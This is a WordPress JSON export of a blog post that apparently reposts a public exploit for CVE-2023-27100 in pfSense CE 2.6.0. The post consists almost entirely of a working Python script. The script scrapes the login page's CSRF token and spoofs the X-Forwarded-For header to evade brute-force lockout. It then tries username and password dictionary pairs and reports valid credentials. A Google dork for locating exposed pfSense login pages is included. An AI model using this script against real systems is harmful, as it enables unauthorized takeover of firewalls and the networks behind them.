{"id":40267,"date":"2023-04-10T23:41:09","date_gmt":"2023-04-10T19:41:09","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171791\/pfsensece260-bypass.txt"},"modified":"2023-04-12T01:14:19","modified_gmt":"2023-04-11T20:44:19","slug":"pfsensece-2-6-0-protection-bypass","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/pfsensece-2-6-0-protection-bypass\/","title":{"rendered":"pfsenseCE 2.6.0 Protection Bypass"},"content":{"rendered":"

#!\/usr\/bin\/python3<\/p>\n

## Exploit Title: pfsenseCE v2.6.0 – Anti-brute force protection bypass
\n## Google Dork: intitle:”pfSense – Login”
\n## Date: 2023-04-07
\n## Exploit Author: FabDotNET (Fabien MAISONNETTE)
\n## Vendor Homepage: https:\/\/www.pfsense.org\/
\n## Software Link: https:\/\/atxfiles.netgate.com\/mirror\/downloads\/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
\n## Version: pfSenseCE <= 2.6.0
\n## CVE: CVE-2023-27100<\/p>\n

# Vulnerability
\n## CVE: CVE-2023-27100
\n## CVE URL: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-27100
\n## Security Advisory: https:\/\/docs.netgate.com\/downloads\/pfSense-SA-23_05.sshguard.asc
\n## Patch: https:\/\/redmine.pfsense.org\/projects\/pfsense\/repository\/1\/revisions\/9633ec324eada0b870962d3682d264be577edc66<\/p>\n

import requests
\nimport sys
\nimport re
\nimport argparse
\nimport textwrap
\nfrom urllib3.exceptions import InsecureRequestWarning<\/p>\n

# Expected Arguments
\nparser = argparse.ArgumentParser(description=”pfsenseCE <= 2.6.0 Anti-brute force protection bypass”,
\nformatter_class=argparse.RawTextHelpFormatter,
\nepilog=textwrap.dedent(”’
\nExploit Usage :
\n.\/CVE-2023-27100.py -l http:\/\/<pfSense>\/ -u user.txt -p pass.txt
\n.\/CVE-2023-27100.py -l http:\/\/<pfSense>\/ -u \/Directory\/user.txt -p \/Directory\/pass.txt”’))<\/p>\n

parser.add_argument(“-l”, “–url”, help=”pfSense WebServer (Example: http:\/\/127.0.0.1\/)”)
\nparser.add_argument(“-u”, “–usersList”, help=”Username Dictionary”)
\nparser.add_argument(“-p”, “–passwdList”, help=”Password Dictionary”)
\nargs = parser.parse_args()<\/p>\n

if len(sys.argv) < 2:
\nprint(f”Exploit Usage: .\/CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]”)
\nsys.exit(1)<\/p>\n

# Variable
\nurl = args.url
\nusersList = args.usersList
\npasswdList = args.passwdList<\/p>\n

# Suppress only the single warning from urllib3 needed.
\nif url.upper().startswith(“HTTPS:\/\/”):
\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<\/p>\n

print(‘pfsenseCE <= 2.6.0 Anti-brute force protection bypass’)<\/p>\n

def login(userlogin, userpasswd):
\nsession = requests.session()
\nr = session.get(url, verify=False)<\/p>\n

# Getting CSRF token value
\ncsrftoken = re.search(r’input type=\\’hidden\\’ name=\\’__csrf_magic\\’ value=”(.*?)”‘, r.text)
\ncsrftoken = csrftoken.group(1)<\/p>\n

# Specifying Headers Value
\nheaderscontent = {
\n‘User-Agent’: ‘Mozilla\/5.0’,
\n‘Referer’: f”{url}”,
\n‘X-Forwarded-For’: ‘42.42.42.42’
\n}<\/p>\n

# POST REQ data
\npostreqcontent = {
\n‘__csrf_magic’: f”{csrftoken}”,
\n‘usernamefld’: f”{userlogin}”,
\n‘passwordfld’: f”{userpasswd}”,
\n‘login’: ‘Sign+In’
\n}<\/p>\n

# Sending POST REQ
\nr = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)<\/p>\n

# Conditional loops
\nif r.status_code != 200:
\nprint(f'[*] – Found Valid Credential !!’)
\nprint(f”[*] – Use this Credential -> {userlogin}:{userpasswd}”)
\nsys.exit(0)<\/p>\n

# Reading User.txt & Pass.txt files
\nuserfile = open(usersList).readlines()
\npassfile = open(passwdList).readlines()<\/p>\n

for user in userfile:
\nuser = user.strip()
\nfor passwd in passfile:
\npasswd = passwd.strip()
\nlogin(user, passwd)<\/p>\n","protected":false},"excerpt":{"rendered":"

#!\/usr\/bin\/python3 ## Exploit Title: pfsenseCE v2.6.0 – Anti-brute force protection bypass ## Google Dork: intitle:”pfSense – Login” ## Date: 2023-04-07 ## Exploit Author: FabDotNET (Fabien MAISONNETTE) ## Vendor Homepage: https:\/\/www.pfsense.org\/ ## Software Link: https:\/\/atxfiles.netgate.com\/mirror\/downloads\/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz ## Version: pfSenseCE <= 2.6.0 ## CVE: CVE-2023-27100 # Vulnerability ## CVE: CVE-2023-27100 ## CVE URL: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-27100 ## Security Advisory: https:\/\/docs.netgate.com\/downloads\/pfSense-SA-23_05.sshguard.asc …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40267","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40267","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40267"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40267\/revisions"}],"predecessor-version":[{"id":40302,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40267\/revisions\/40302"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40267"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40267"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40267"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}